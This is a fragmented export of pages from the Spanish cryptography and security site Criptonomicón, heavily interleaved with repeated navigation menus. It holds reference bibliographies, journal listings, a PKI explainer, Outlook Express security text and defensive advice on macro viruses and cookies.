Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Remailers
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Renuncia
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Visite la excelente pgina administrada por Manuel Porras Quintela, sobre Derecho,
Informtica y Tecnologas de la Informacin y Comunicaciones. Si desea saber en
qu situacin se encuentra el Derecho, en relacin con estos temas, tan slo tiene que
navegar por sus pginas y empaparse del conocimiento jurdico del final del milenio.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Criptografa moderna
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
Divulgacin
Teora de nmeros y
codificacin
JavaScript
Cookies
Crashes
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Navegacin segura
Control de acceso
CGI
Divulgacin
Criptografa moderna
Teora de nmeros y
Java
JavaScript
codificacin
Seguridad
Criptoanlisis
Artculos
Revistas
Otros
Cookies
Crashes
Andrew Hodges: Alan Turing: The Enigma. Burnett Books Ltd., 1983
Agujeros
Spam
Anonimato
Correo seguro
Web seguro
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Susurros desde la Cripta
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Referencias
Libro de Visitas
Criptografa moderna
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Criptografa moderna
D. Bayer, S. Haber, and W.S. Stornetta: Improving the efficiency
and reliablility of digital time-stamping. In R.M. Capocelli, editor,
Sequences '91: Methods in Communication, Security, and
Computer Science, Springer-Verlag, Berlin, 1992.
Divulgacin
Criptografa moderna
Teora de nmeros y
codificacin
Seguridad
Criptoanlisis
CGI
Java
Artculos
Revistas
Otros
Cookies
Crashes
James Cooper: Computer and Communications Security. Mc. Graw Hill, 1989.
Agujeros
E. Dawson and J. Golic: Criptography: Policy and Algoritms. Spriger Verlag, Berlin,
1995.
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Criptografa moderna
Consejos prcticos
Referencias
Libro de Visitas
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Divulgacin
Criptografa moderna
Linux
Navegacin segura
Control de acceso
Teora de nmeros y
codificacin
CGI
Java
JavaScript
Seguridad
Criptoanlisis
Artculos
Revistas
Otros
Cookies
Crashes
T.H. Cormen, C.E. Leiserson, and R.L. Rivest. Introduction to Algorithms. MIT
Press, Cambridge, Massachusetts, 1990.
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Divulgacin
Criptografa moderna
Teora de nmeros y
codificacin
Seguridad
Criptoanlisis
Artculos
Revistas
Otros
Agujeros
S. Garfinkel and G. Spafford, Practical UNIX and Internet Security, O'Reilly &
Associates, Inc., 1996.
Spam
Remailers
Simson Garfinkel with Gene Spafford, Web Security & Commerce, O'Reilly &
Associates, Inc., 1997.
Anup K. Ghosh, E-commerce security, John Wiley & Sons, Inc., 1998.
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
A. D. Rubin, D. Geer, and M. J. Ranum, Web Security Sourcebook, John Wiley &
Sons, Inc., 1997.
Deborah Russell & G.T. Gangemi, Sr., Computer Security Basics, O'Reilly &
Associates, Inc., 1991.
L. D. Stein, "The World Wide Web SecurityFAQ", WWW Consortium, Nov 1997.
Mark Taber, Maximum Security: A Hacker's Guide to Protecting Your Internet Site
and Network, Macmillan Computer Publishing, 1998.
John Vacca, Los secretos de la Seguridad en Internet, Anaya Multimedia, 1997.
Peter Wayner, Disappearing Cryptography, AP Professional, 1996.
Peter Wayner, Digital Copyright Protection, AP Professional, 1997.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Tcnicas de criptoanlisis
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Tcnicas de criptoanlisis
Libros
Nuevo Electronic Frontier Foundation, Cracking DES Secrets of
Encryption, Research, Wiretap Politics & Chip Design, O'Reilly
&
Associates, 1998.
Control de acceso
CGI
Java
JavaScript
Herramientas
Crashes
Spam
PKZip Cracker
Remailers
Anonimato
Zip Crack
Solve-Vigenere
Wincrack
Correo seguro
Word Cracker
Web seguro
Criptografa moderna
Teora de nmeros y
codificacin
Seguridad
Criptoanlisis
Artculos
Revistas
Otros
Cookies
Agujeros
Divulgacin
Tcnicas de criptoanlisis
Consejos prcticos
Referencias
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Libro de Visitas
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Divulgacin
Criptografa moderna
Teora de nmeros y
codificacin
Seguridad
Criptoanlisis
Artculos
Revistas
Java
JavaScript
Cookies
Crashes
Otros
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
1975.
A. Fiat and A. Shamir. How to prove yourself: Practical solutions to identification
and signature problems. In Advances in Cryptology --- Crypto '86, pages 186--194,
Springer-Verlag, New York, 1987.
A. Fster, D. De La Gua, J. Negrillo, F. Montoya. Estructuras no lineales para la
generacin de secuencias binarias de Aplicacin Criptogrfica. Actas Del IV
Simposium Nacional De La Union Cientifica Internacional De Radio. 1991. Pags
904 a 908. Septiembre. Caceres.
A. Fster, D. de la Gua, J. Negrillo, F. Montoya. Diseo e implementacin de
algoritmos de generacin de secuencias binarias. Actas de la I Reunion Espaola
sobre Criptografia. 1991. Octubre. Palma de Mallorca.
A. Fuster, R. E. Lillo: Visin probabilstica de las secuencias binarias de aplicacin
criptogrfica. Actas de la II Reunion Espaola sobre Criptografia. 1992. Octubre.
Madrid.
A. Fuster y P. Caballero: On the linear complexity of nonlinearly filtered
PN-sequences. Pre-Proceedings of the ASIACRPT'94 61--71. . Wollongong,
Australia, Nov 1994.
G. Garon, R. Outerbridge, DES watch: an examination of the sufficiency of the Data
Encryption Standard for financial institutions in the 1990's. Cryptologia, vol. XV, #3,
177--193, 1991.
P.R.Geffe, "How to Protect Data with Ciphers that Are Really Hard to Break".
Electronics. Vol. 46, No. 1, Jan. 1973.
Shafi Goldwasser, Silvio Micali, Probabilistic Encryption and How To Play Mental
Poker Keeping Secret All Partial Information. Proceedings of the Fourteenth Annual
ACM Symposium on Theory of Computing, 1982.
S. Goldwasser and S. Micali. Probabilistic encryption. J. of Computer and System
Sciences, 28:270--299, 1984.
D.M. Gordon and K.S. McCurley. Massively parallel computation of discrete
logarithms. In Advances in Cryptology --- Crypto '92, Springer-Verlag, New York,
1993.
D. de la Gua, F. Montoya, E. Valderrama y Ll. Porta: ASIC-CRIPTO: un circuito
integrado para el mdulo de seguridad del PLANBA. Actas de la III Reunin
Espaola sobre Criptologa. 1992, Nov. 1994.
D. de la Gua y A. Fuster: Arquitecturas criptogrficas a partir de productos
modulares. Actas de la III Reunin Espaola sobre Criptologa. 1992, Nov. 1994.
D. de la Gua y A. Fuster: Mdulo de Cifrado para Seguridad en Redes de
Transmisin de Datos. Actas del IX Symposium Nacional de la Union Cientfica
Internacional de Radio, 852--856. Las Palmas, Sep. 1994.
file:///C|/TEMP/criptonomicon/criptonomicon/articulos.html (4 of 9) [25/10/2000 02:30:42 p.m.]
AT&T Bell Laboratories Technical Journal, Vol. 63 #8, part 2, 1673--1684, October,
1984.
R.L. Rivest, A. Shamir, and L. Adleman. A method for obtaining digital signatures
and public-key cryptosystems. Communications of the ACM, 21(2):120--126,
February 1978.
R.L. Rivest. Cryptography. In J. van Leeuwen, editor, Handbook of Theoretical
Computer Science, MIT Press/Elsevier, Amsterdam, 1990.
R.L Rivest. The MD4 message digest algorithm. In Advances in Cryptology --Crypto '90, pages 303--311, Springer-Verlag, New York, 1991.
R.L. Rivest. Finding four million random primes. In Advances in Cryptology --Crypto '90, pages 625--626, Springer-Verlag, New York, 1991.
M. Romera, I. Jimenez, J. Negrillo: Generacin de secuencias cifrantes mediante
funciones caoticas. Actas de la I Reunion Espaola sobre Criptografia. 1991.
Octubre. Palma de Mallorca.
C.P. Schnorr. Efficient identification and signatures for smart cards. In Advances in
Cryptology --- Crypto '89, pages 239--251, Springer-Verlag, New York, 1990.
C. Shannon, Communication Theory of Secrecy Systems. Bell System Technical
Journal 28(4), 656--715, 1949.
M. Shand and J. Vuillemin. Fast implementations of RSA cryptography. In
Proceedings of the 11th IEEE Symposium on Computer Arithmetic, pages 252--259,
IEEE Computer Society Press, Los Alamitos, CA, 1993.
A. Shimizu, S. Miyaguchi, Fast data encipherment algorithm FEAL. EUROCRYPT
'87, 267--278, 1988.
K. Shirriff, C. Welch, A. Kinsman, Decoding a VCR Controller Code. Cryptologia
16(3), 227--234, 1992.
T. SIEGENTHALER ,"Correlation-immunity of nonlinear combining functions for
cryptographic applications", IEEE Trans. Informat. Theory, Vol. IT-30, pp. 776-780,
Sep. 1984.
R.D. Silverman. The multiple polynomial quadratic sieve. Math. Comp.,
48:329--339, 1987.
M.E. Smid and D.K. Branstad. Response to comments on the NIST proposed Digital
Signature Standard. In Advances in Cryptology --- Crypto '92, Springer-Verlag, New
York, 1993.
A. Sorkin, LUCIFER: a cryptographic algorithm. Cryptologia, 8(1), 22--35, 1984.
R. Spillman et al., Use of Genetic Algorithms in Cryptanalysis of Simple
Substitution Ciphers. Cryptologia 17(1), 31--44, 1993.
K.C. ZENG, C.H. YANG y T.R. RAO, "On the Linear Consistency Test (LCT) in
Cryptoanalysis with Applications", Proc. Crypto89, Springer-Verlag Lecture Notes
in Computer Science, No. 435, pp. 164-174, 1989.
K.C. ZENG, C.H. YANG y T.R. RAO, "Large Primes in Stream-Cipher
Cryptography", Proc. Auscrypt90, Springer-Verlag Lecture Notes in Computer
Science, No. 453, pp. 194-205, 1990
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Revistas especializadas
Suscripcin gratis
Intimidad?
Artculos
Revistas especializadas
ACM Transactions on Information and System Security
Divulgacin
Seguridad
Linux
Navegacin segura
Control de acceso
Cryptobytes
Criptografa moderna
Cryptologia
Teora de nmeros y
Cryptosystems Journal
Designs, Codes and Cryptography
codificacin
Seguridad
Criptoanlisis
Artculos
Revistas
CGI
Java
JavaScript
Otros
Infosecurity News
Intelligence Online
Cookies
Journal of Cryptology
Crashes
Agujeros
Spam
Anonimato
Correo seguro
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Web seguro
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Revistas especializadas
Consejos prcticos
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Divulgacin
Criptografa moderna
Teora de nmeros y
codificacin
Seguridad
Criptoanlisis
Artculos
Revistas
Otros
American National Standards Institute Sales Office, 1430 Broadway, New York, NY
10018. Phone 212.642.4900
ANSI X3.92-1981 Data Encryption Algorithm (identico a FIPS 46-1).
Cookies
Direccin de Aegean Park Press, P.O. Box 2837, Laguna Hills, CA 92654-0837.
Contestador: 714-586-8811. Telfono 800 736-3587 y FAX : 714 586-8269.
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Referencias
Libro de Visitas
Colaborar en el Criptonomicn
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
(si lo prefieres, puedes utilizar mi clave pblica PGP) y yo lo publicara siempre que
sea adecuado en la seccin apropiada del Criptonomicn, junto con tu nombre y link
a tu pgina Web (si as lo deseas).
Cookies
Agujeros
Spam
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Remailers
Anonimato
Correo seguro
Web seguro
Colaborar en el Criptonomicn
Consejos prcticos
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Todava resulta raro encontrarnos con sitios en Internet que declaren abiertamente su
poltica respecto a la privacidad, qu hacen con los datos que obtienen de los
usuarios que navegan por sus pginas y por qu se obtiene informacin acerca de
ellos. Esta pgina es un intento de sentar precedentes, de manera que cada vez sean
ms numerosos los sitios Web que voluntariamente ponen a disposicin de sus
visitantes su poltica respecto a la privacidad. Conmino desde aqu a todos los sitios
importantes a hacer lo mismo.
Artculos
Seguridad
Linux
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Libro de visitas
Suscripcin gratis
Intimidad?
Artculos
Este es el lugar adecuado para que deposites tus sugerencias, comentarios, crticas,
valoraciones, etc. Si deseas colaborar con alguna contribucin, lee antes la pgina
sobre colaboraciones.
Si quieres, tambin puedes calificar mis pginas.
Nombre (opcional):
Seguridad
Navegacin segura
Control de acceso
CGI
Boletn
Qu te ha parecido el Criptonomicn?
JavaScript
Bueno
Cookies
Crashes
Agujeros
Tus comentarios:
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Libro de visitas
Borrar todo
Consejos prcticos
Referencias
Enviar
Libro de Visitas
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Informacin general | Zonas de seguridad | Identificadores digitales | Correo electrnico seguro
Intimidad?
Artculos
Seguridad
Caractersticas de seguridad en
Outlook Express
Linux
Navegacin segura
Control de acceso
CGI
Java
Informacin general
Al extenderse el uso del correo electrnico y del comercio electrnico, la cantidad de informacin
confidencial que se intercambia en Internet ha crecido considerablemente. Por tanto, se necesitan
mensajes de correo electrnico seguros y privados. Con la creciente popularidad de los controles ActiveX,
secuencias de comados y subprogramas Java, aumenta la probabilidad de recibir contenido HTML en un
mensaje electrnico que pudiera modificar archivos de su PC sin su conocimiento.
Outlook Express incluye herramientas que le protegern contra el fraude, asegurarn su privacidad y
evitarn el acceso no autorizado a su PC. Estas herramientas le permitirn enviar y recibir correo
electrnico seguro y controlar mensajes electrnicos potencialmente dainos usando zonas de seguridad.
JavaScript
Zonas de seguridad
Cookies
Las zonas de seguridad de Internet Explorer 4.0 son como los visados que algunos pases expiden a los
viajeros. Si el pas confa en usted, sella su pasaporte de forma que pueda viajar donde desee durante la
visita. Si el pas no confa plenamente en usted, limita estrictamente los lugares de visita durante su
estancia.
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Identificadores digitales
Web seguro
Para usar correo electrnico seguro en Outlook Express, necesita un identificador digital. Los
identificadores digitales (tambin llamados certificados) proporcionan un medio de probar su identidad
en Internet.
Los identificadores digitales le permiten firmar el correo electrnico para que los destinatarios se
Referencias
Libro de Visitas
aseguren de que el mensaje es realmente de usted y que no se alter. Tambin, los identificadores
digitales permiten a otras personas enviar mensajes cifrados. Para obtener ms informacin, busque
Estado de confianza de los identificadores digitales en la Ayuda de Outlook Express.
Nota: La informacin de esta pgina es una reproduccin del correo que se distribuye a los usuarios nuevos de Outlook Express,
titulado "Caractersticas de seguridad en Outlook Express".
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Informacin adicional
Firma digital
Borrar
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
file:///C|/TEMP/criptonomicon/criptonomicon/images/firma.gif
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
ser la respuesta.
Ahora bien, cmo podemos estar seguros de que la clave pblica de un
usuario, que hemos encontrado por ejemplo en un directorio o una pgina
web, corresponde realmente a ese individuo y no ha sido falsificada por
otro? Cmo fiarnos de esa clave pblica antes de confiarle algn secreto
nuestro? La solucin ms ampliamente adoptada consiste en recurrir a una
tercera parte confiable, erigida en la figura de una autoridad de certificacin
(AC). La funcin bsica de una AC reside en verificar la identidad de los
solicitantes de certificados, crear los certificados y publicar listas de
revocacin cuando stos son inutilizados. El certificado contiene de forma
estructurada informacin acerca de la identidad de su titular, su clave pblica
y la AC que lo emiti. Actualmente, el estndar al uso es el X.509.v3.
Con el tiempo, una autoridad de certificacin puede verse fcilmente
desbordada si cubre un rea geogrfica muy extensa o muy poblada, por lo
que a menudo delega en las llamadas autoridades de registro (AR) la labor
de verificar la identidad de los solicitantes. Las AR pueden abrir multitud de
oficinas regionales dispersas por un gran territorio, llegando hasta los
usuarios en los sitios ms remotos, mientras que la AC se limitara as a
certificar a todos los usuarios aceptados por las AR dependientes de ella.
Gracias a esta descentralizacin se agiliza el proceso de certificacin y se
aumenta la eficacia en la gestin de solicitudes.
En definitiva, una PKI incluir una o varias autoridades de registro para
certificar la identidad de los usuarios; una o varias autoridades de
certificacin que emitan los certificados de clave pblica; un repositorio de
certificados, accesible va web u otro medio, donde se almacenen los
certificados; las listas de revocacin de certificados (CRL), donde se listan
los certificados suspendidos o revocados; y, por supuesto, los propios
certificados.
Los mayores obstculos a los que se han enfrentado las empresas pioneras
en la implantacin de soluciones PKI para sus necesidades de negocio
electrnico (e-Business) han sido tradicionalmente:
La falta de interoperabilidad, ya que el mero hecho de ceirse al
estndar X.509.v3 no garantiza en absoluto que dos certificados
generados por dos sistemas desarrollados por casas distintas sean
mutuamente compatibles. Adems, existen problemas de confianza
entre AC de distintas organizaciones, que puede imposibilitar la
verificacin con xito de cadenas de certificacin cuya AC raz sea
desconocida o no confiable, invalidndose todo el esquema de PKI.
El coste ha sido un problema desde el principio. Al no existir un
mercado suficientemente maduro en PKI, cada empresa que ofrece
soluciones de clave pblica tarifica en funcin de criterios diversos (por
certificado, por uso de certificado, por servidores instalados,...) y cobra
honorarios tambin dispares, de manera que la inversin en PKI como
Informacin adicional
Firma digital
Borrar
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
Informacin adicional
http://www.cs.adfa.oz.au/teaching/studinfo/csc/lectures/publickey.html
http://fennario.math.pitt.edu/~frank/crypto/crypto/node41.html
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Comercio electrnico
Cuestiones legales
Desde esta pgina puedes acceder a los artculos publicados sobre comercio
electrnico en el Boletn del Criptonomicn en la seccin Hablan los expertos.
Intimidad y privacidad
Virus
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Criptologa y seguridad
Cuestiones legales
Desde esta pgina puedes acceder a los artculos publicados sobre criptologa y
seguridad en el Boletn del Criptonomicn en la seccin Hablan los expertos.
Intimidad y privacidad
Virus
Control de accesos
Marcas de agua
El azar en la criptografa
Conocimiento Nulo
Cortafuegos
Criptografa visual
Esquemas umbrales
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Desde esta pgina puedes acceder a los artculos publicados sobre cuestiones legales
y jurdicas en el Boletn del Criptonomicn en la seccin Hablan los expertos.
Intimidad y privacidad
Virus
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Intimidad y privacidad
Cuestiones legales
Desde esta pgina puedes acceder a los artculos publicados sobre intimidad y
privacidad en el Boletn del Criptonomicn en la seccin Hablan los expertos.
Intimidad y privacidad
Virus
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Virus
Cuestiones legales
Desde esta pgina puedes acceder a los artculos publicados sobre virus en el Boletn
del Criptonomicn en la seccin Hablan los expertos.
Intimidad y privacidad
Virus
Comparativa de antivirus
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Ud. debe tener en cuenta que los virus, son meramente programas escritos
Virus
puedan lanzar ningn virus (ni trojan). Las cookies no encierran ninguna
amenaza. Muchos sitios, almacenan en estos archivos, cierta informacin
cuando usted los visita, y de ese modo no es necesario volver a realizar
algunos ajustes como los de las preferencias (frames o no frames por
ejemplo), etc. . De todos modos, tanto el IE Explorer como el Netscape, le
dan a Ud. algn control sobre si desea aceptar o no estos "cookies".
Puede configurar su browser para aceptarlos o no, o el navegador le puede
preguntar si acepta o no, cada vez que un sitio desea almacenar una
"galleta" en su disco. Estos archivos, adems, se guardan normalmente en
un directorio (carpeta) separado.
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Por supuesto nunca abras un programa .exe embebido dentro del documento Word,
ya que podra contener un virus.
En Word7 u Office 97, activa la opcin de abrir documentos sin macros. Si no est
activada, Word te avisar en cualquier caso al disponerse a abrir un documento que
contenga macros.
Para ms informacin, consulta la informacin de Microsoft, Comprobar que los
documentos no contienen macros con virus.
Crashes
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Spam
Remailers
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Anonimato
Correo seguro
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Si lo desea, puede dejar de comprobar si los documentos contienen macros con virus.
Cuando Word muestre el mensaje de advertencia de virus de macros, desactive la
casilla de verificacin Preguntar siempre antes de abrir documentos con macros o
personalizaciones. Tambin puede desactivar la comprobacin de macros en
cualquier momento. En el men Herramientas, haga clic en Opciones, en la ficha
General y, a continuacin, desactive la casilla de verificacin Proteccin antivirus en
macros.
Nota Para obtener ms informacin acerca de los virus de macros, incluso cmo
adquirir software antivirus que examine los documentos existentes y elimine los
virus de macros, puede descargar la informacin sobre proteccin antivirus de
Microsoft en World Wide Web.
Libro de Visitas
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
